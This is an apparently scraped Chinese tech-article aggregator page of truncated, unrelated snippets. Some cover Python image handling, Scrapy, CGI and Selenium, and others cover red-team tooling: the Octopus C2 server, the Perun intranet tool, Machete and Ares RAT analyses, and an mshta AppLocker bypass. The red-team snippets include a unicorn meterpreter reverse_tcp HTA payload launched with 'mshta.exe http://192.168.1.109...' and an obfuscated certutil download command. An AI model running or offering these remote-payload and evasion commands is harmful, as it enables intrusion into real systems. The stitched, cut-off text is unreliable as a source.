如下代码段是关于python 从网络URL读取图片并直接处理的代码。...import urllib2 import Image import cStringIO def ImageScale(url,size): file = cStringIO.StringIO(urllib2....urlopen(url).read()) img = Image.open(file) img.show()
有时候,我们要从一段很长的 URL 里面提取出域名。...可能有人会这样写代码: url = 'https://www.kingname.info/2020/10/02/copy-from-ssh/' domain = '.'.join(url.split('...不过好在 Python 有一个第三方库已经解决了这个问题,这就是 tld。...我们先来安装它: python3 -m pip install tld 安装完成以后,我们来看看它的使用方法: >>> url = 'https://www.kingname.info/2020/10/...> domain_with_suffix = result.fld >>> print(domain_with_suffix) kingname.info 首先使用 get_tld 生成一个对象,然后通过对象的
前言 从网络上下载图片的时候,我们不一定能从URL中获取图片格式。 所以,从图片本身获取图片格式,是比较通用而且方便的方法了。...但是,PIL一般都是从文件读取图片数据,那么如何从requests.content里面读取呢?...install requests Pillow 实现代码: import BytesIO,requests from PIL import Image from uuid import uuid #图片URL...url='http://www.zalou.cn/favicon.ico' req=requests.get(url) #使用BytesIO接口 image=Image.open(BytesIO(
文章前言 Octopus是基于python开发的一款可操作的C2服务器,可以通过HTTP/S控制Octopus powershell代理,其主要目的是要在任何红队行动之前使用,而不是开始与您的整个作战武库和基础设施接触...,您还可以通过为您的域提供有效的证书并配置Octopus C2服务器以使用它来选择使用SSL/TLS 功能特性 Octopus具有许多功能,可让您在部署实际需要的军械库、工具和技术之前了解可能会涉及到的点有哪些...,例如: 下载文件 执行系统命令 通过HTTP/S控制代理 加载外部Powershell模块 在C2和代理之间使用加密的通道(AES-256) 使用不起眼的技术执行命令并传输结果 为每个目标创建自定义侦听器和多个侦听器...从端点自动收集信息(端点态势感知)功能 工具安装 获取项目并安装第三方依赖: git clone https://github.com/mhaskar/Octopus.git sudo pip3 install...URL:承载有效负载的页面的名称(例如:index.php) Listener_name:要使用的侦听器名称 您还可以通过运行以下listen_http命令来查看示例: 我们可以使用以下命令启动侦听器
Octopus是一个开源的、基于python的预操作C2服务器,可以通过HTTP/S控制Octopus的powershell代理。...您还可以通过为您的域提供有效的证书并配置 Octopus C2 服务器来使用它来选择使用 SSL/TLS。...在不接触 powershell.exe 进程的情况下运行 Octopus windows 可执行代理。 自动从端点(端点态势感知)功能收集信息。.../octopus.py 运行它后,您将看到以下内容: image.png 使用 Octopus 非常简单易用,因为您只需要启动一个侦听器并根据该侦听器的信息生成您的代理。...,生成的 shellcode 使用 CreateProcessA 启动 powershell.exe oneliner,它将启动 powershell 代理。
其中DOS命令start这个命令,它可以启动一个exe程序,也可以启动一个BAT批处理脚本。 它是一个比较重要的命令,start这个命令是个并行的命令,就是说运行exe的时候它可以同时运行多个。...如果想在命令行中执行以下命令: python -m webbrowser -t "https://cybermap.kaspersky.com/" 会发现系统的默认浏览器自动启动,并在窗口中打开了https...如果在Python中调用webbrowser模块,具体用法如下所示: 在交互式环境中输入如下命令: webbrowser.open(url, new=0, autoraise=True) webbrowser.open_new...(url) webbrowser.open_new_tab(url) 其中new参数,表示如何打开页面: new=1:在新的浏览器窗口中打开网页。...本书通过多个职场案例,详细并系统地讲解了WPS Office中最常用的WPS文字、WPS表格、WPS演示三个办公组件的应用,同时对PDF、流程图、脑图、金山海报、表单也分别列举了一个实用的案例,对WPS
因为我发现大多数教材都是教你如何从网络上爬取内容,然后就结束了。 但是我们爬下来的内容是要使用的啊? 这方面的就很少。还记得我之前分享过的博客开发系列吗?...3.自动发布博客,并介绍如何绑定域名。 4.每天躺在床上看自己的博客“更新”。 今天我们先看第一个, 爬虫框架Scrapy。 首先,爬虫是什么呢? 爬虫的原理是什么?...编写第一个爬虫(Spider) Spider是用户编写用于从单个网站(或者一些网站)爬取数据的类。...其包含了一个用于下载的初始URL,如何跟进网页中的链接以及如何分析页面中的内容, 提取生成 item 的方法。...start_urls: 包含了Spider在启动时进行爬取的url列表。 因此,第一个被获取到的页面将是其中之一。 后续的URL则从初始的URL获取到的数据中提取。
因为我发现大多数教材都是教你如何从网络上爬取内容,然后就结束了。但是我们爬下来的内容是要使用的啊? 这方面的就很少。还记得我之前分享过的博客开发系列吗?...3.自动发布博客,并介绍如何绑定域名。 4.每天躺在床上看自己的博客“更新”。 今天我们先看第一个, 爬虫框架Scrapy。 首先,爬虫是什么呢?爬虫的原理是什么?...编写第一个爬虫(Spider) Spider是用户编写用于从单个网站(或者一些网站)爬取数据的类。...其包含了一个用于下载的初始URL,如何跟进网页中的链接以及如何分析页面中的内容, 提取生成 item 的方法。...start_urls: 包含了Spider在启动时进行爬取的url列表。因此,第一个被获取到的页面将是其中之一。后续的URL则从初始的URL获取到的数据中提取。
3、处理步骤 1.浏览器通过HTML表单或超链接请求指向一个CGI应用程序的URL。 2.服务器收发到请求。 3.服务器执行指定CGI应用程序。...4、网页浏览 为了更好的了解CGI是如何工作的,我们可以从在网页上点击一个链接或URL的流程: 1、使用你的浏览器访问URL并连接到HTTP web 服务器。...2、Web服务器接收到请求信息后会解析URL,并查找访问的文件在服务器上是否存在,如果存在返回文件的内容,否则返回错误信息。 3、浏览器从服务器上接收信息,并显示接收的文件或者错误信息。...脚本文件: AddHandler cgi-script .cgi .py 启动httpd服务: # service httpd start 2、第一个CGI程序 我们使用Python创建第一个CGI...5、GET和POST方法 浏览器客户端通过 GET 方法和 POST 方法向服务器传递信息。
前言 Octopus是基于python3的开源项目,可进行操作的C2服务器,可以通过HTTP / S控制Octopus powershell代理。...您还可以通过为您的域提供有效的证书并配置Octopus C2服务器以使用它来选择使用SSL / TLS。...listener_name 监听器ip 监听器端口 主机名 间隔时间 页面url 监听器名称 启动一个http监听器: listen_http BindIP BindPort...Generate_powershell:生成一个powershell载荷(前提是需要一个监听器) powershell单行代码将使您能够生成powershell命令,该命令可直接从C2下载并执行有效负载...由于使用了@ahmedkhlief,他可以重用APT34威胁组中的代码,该威胁组从C2下载HTA文件内容并使用mshta.exe受信任的Windows二进制文件运行,以获取最终的Powershell代理已执行
"same-origin", "Pragma": "no-cache", "Te": "trailers", "Cache-Control": "no-cache", } # 从url.txt...文件中读取URL列表 with open('url.txt', 'r') as f: urls = f.read().splitlines() # 循环发送GET请求并判断回显结果 for url...if len(sys.argv) < 2: print("Usage: python test.py ") sys.exit(1) url = sys.argv[1] post_url...中间插入“”字符 cert^u^t^il -url""""cache -sp""""lit -f http://192.168.xx.xx:7070/test.txt 通用:可通过py编写脚本 fuzz...ipc$,请删除在连) 错误号1326,未知的⽤户名或错误密码(#原因很明显) 错误号1792,试图登录,但是⽹络登录服务没有启动(#⽬标NetLogon服务末启动。
在内网环境中只需上传Perun的启动器文件(未安装Python的主机环境下可以使用Pyinstaller打包生成的单个控制台exe二进制启动器文件,大小在3-5M),其余文件可以部署在云端,也可以部署在目标内网中...Perun由Perun.py(或是由Perun.py打包生成的二进制文件)启动,有两种方式加载,远程加载和本地加载,通过-l/--load-file-path参数指定本地文件路径或者远程地址url后,...这样可以在保证项目开发目录结构清晰的同时,只需要一个启动器文件在内网环境中即可工作,其余文件可部署在公网云端或内网环境本地,单个启动器文件方便打包成更小的exe二进制文件,且更新插件不需要重新打包(如导入新的.../dist/Perun.exe,大小应该在4.5M左右 打包到更小 通过UPX压缩,Perun打成后生成文件应该不会超过3.5M 下载UPX(存放到Perun/doc/package2exe目录下,...目录 cd Perun/doc/package2exe 根据.spec文件直接打包,并通过upx压缩 pyinstaller Perun.spec --upx-dir=upx-3.95-win64
文件形式存在 比如谷歌的chromedriver.exe、火狐的geckodriver.exe、IE的IEDriverServer.exe 浏览器 浏览器当然就是我们很熟悉的常用的各种浏览器。...那在WebDriver脚本运行的时候,它们之间是如何通信的呢?为什么同一个browser driver即可以处理java语言的脚本,也可以处理python语言的脚本呢?...常见的http请求方法: GET:用来从服务器获取信息。比如获取网页的标题信息 POST:向服务器发送操作请求。...localhost:9515 浏览器则会监听这个端口 2、webservice会将脚本语言翻译成json格式传递给浏览器执行操作命令 逻辑层面: 1、测试人员执行测试脚本后,就创建了一个session, 通过...我们可以验证一下: 下载好chromedriver,放到环境变量里,注意要和chrome浏览器版本对上,然后执行chromedriver 可以看到,会启动一个server, 并开启端口9515: andersons-iMac
但是今天,您将学习如何使用mshta.exe绕过Applocker策略。 而且要了解上述攻击的不同方法总是很方便的。...进入该文件夹并查看通过键入以下命令创建的文件列表: cd hta_attack/ ls 现在,您将可以看到.hta文件,即Launcher.hta。启动python服务器,以便可以共享文件。...为此,请输入: python -m SimpleHTTPServer 80 服务器启动并运行后,在受害者的PC的cmd提示符下执行以下命令: mshta.exe http://192.168.1.109...创建文件后,打开python服务器,通过键入以下内容将文件共享给受害者的PC: python -m SimpleHTTPServer 80 通过键入以下命令来运行以上文件: mshta.exe http...现在,首先,通过键入以下内容在/ usr / share / greatsct-output中启动python的服务器: python -m SimpleHTTPServer 80 现在,在受害计算机的命令提示符下执行
从菜单中选择第一个选项,输入1并选择第一个选项以选择Social-Engineering Attacks。...在kali的终端打开并输入: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta 执行上述命令将启动创建....进入该文件夹,通过键入以下命令查看创建的文件列表: cd hta_attack/ ls 现在您可以看到.hta文件,即launcher.hta。启动python服务器以便共享此文件。...为此,请输入以下命令: python -m SimpleHTTPServer 80 服务器启动并运行后,在受害者PC的cmd提示符中执行以下命令: mshta.exe http://192.168.1.109...创建文件后,打开python服务器,通过输入以下内容将文件共享到受害者的PC: python -m SimpleHTTPServer 80 输入以下命令运行上述文件: mshta.exe http:192.168.1.109
Selenium简单介绍 https://selenium-python.readthedocs.io/ https://python-selenium-zh.readthedocs.io/zh_CN/...latest/ 什么是selenium 通过浏览器驱动来自动化操纵浏览器的工具 selenium -> 传输指令 -> webdriver -> 转换指令 -> 浏览器 webdriver的出现是为了兼容各语言各版本..., 使java或者python都可以通过同一个webdriver达到操纵浏览器的目的. selenium常用来做什么?...快速启动 创建一个webdriver驱动实例 from selenium import webdriver driver_path = r"H:\drivers\chromedriver.exe".../" main("鼠标", jd_url)
提取文件后会执行Machete的py2exe组件, py2exe 是将Python转换为Windows可执行文件的工具,这些可执行文件运行不需要Python环境。...后门组件 Machete的后门内含三个py2exe组件:GoogleCrash.exe,Chrome.exe和GoogleUpdate.exe。首先执行GoogleCrash.exe再启动另外两个。...GoogleUpdate.exe 该组件负责与远程服务器通信。从jer.dll文件中读取远程连接配置:域名,用户名和密码。Machete主要通过FTP进行通信,HTTP通信是在2019年实现的。...在实际发送之前,文件会从events文件夹复制到instance_db文件夹。通过HTTP协议POST请求发送文件,文件夹名称会被更改,如图所示。 ?...在2019年6月,Machete停止使用FTP通信,并开始为主要通过http与C&C服务器通信。域名 tobabean[.]expert指向IP地址142.44.236.215。
通过调用CreateProcess()函数启动Windows操作系统中的新进程,该函数将以下命令行作为字符串(对CreateProcess的lpComandLine参数):int CreateProcess...漏洞是由于命令行参数从JRE到Windows的不正确传递而产生的,对于Java应用程序,在CreateProcess()函数启动之前调用ProcessBuilder()。...然后CreateProcess()在阶段1重新启动,批处理文件的名称作为cmd.exe的第一个参数传递。...由于Java(ProcessImpl())确实没有额外的报价为这种隐含的cmd.exe上传递的参数调用推广,通过加工参数的cmd.exe现在被用来执行,呈现固有的问题,如果参数不传递给cmd.exe的正确...元字符“特别有趣:当cmd正在转换命令行并看到”时,它会将“复制”到新的命令行,然后开始将字符从旧命令行复制到新命令行,而不会看到是否有任何这些字符是元字符。
下面主要阐述下如何实现根据 url 生成其对应内容全量截图(图中蓝色部分)。...以Windows平台为例,PhantomJS提供了一个exe文件,可以通过在JAVA或者Python中进行简单的封装调用即可,下面对其用法进行简单介绍。...在工程中调用PhantomJS的用法如下: JAVA实现 JAVA工程中可以通过拼接命令并调用exe文件执行抓取操作来实现。...考虑先准备一份js模板,然后代码中处理替换掉js模板中的url和pic_name字段,并调用phantomjs.exe screenshot.js命令完成图片抓取。...下面介绍下在python中通过chrome headless进行url全图保存的实现方式。
针对持久化感染,恶意软件主要通过启动菜单或运行注册表键来在目标系统重启之后加载最终的RAT Payload。...,并分析出恶意软件感染的第一阶段执行流程: 1、创建一个crontab通过系统重启后以当前用户名实现持久化感染; 2、将诱饵文件下载到目标目录“/.local/share”中并打开它; 3、将Ares代理下载到...python 运行一个Python命令或Python文件 persist 通过自动启动目录安装代理 clean 卸载代理 exit 终止代理运行 crack 移除持久化感染并终止代理运行 listall...查看文件目录并上传至服务器 help 显示帮助信息 执行一个Shell命令并返回输出结果 除了将名称从ares更改为gedit之外,我们在代理中没有观察到任何重大变化,代理使用的服务器硬编码在配置文件中...用户一旦打开PDF便会触发漏洞,并通过WinRAR应用程序的ShellExecute功能悄悄启动文件夹内的Payload。
领取专属 10元无门槛券
手把手带您无忧上云
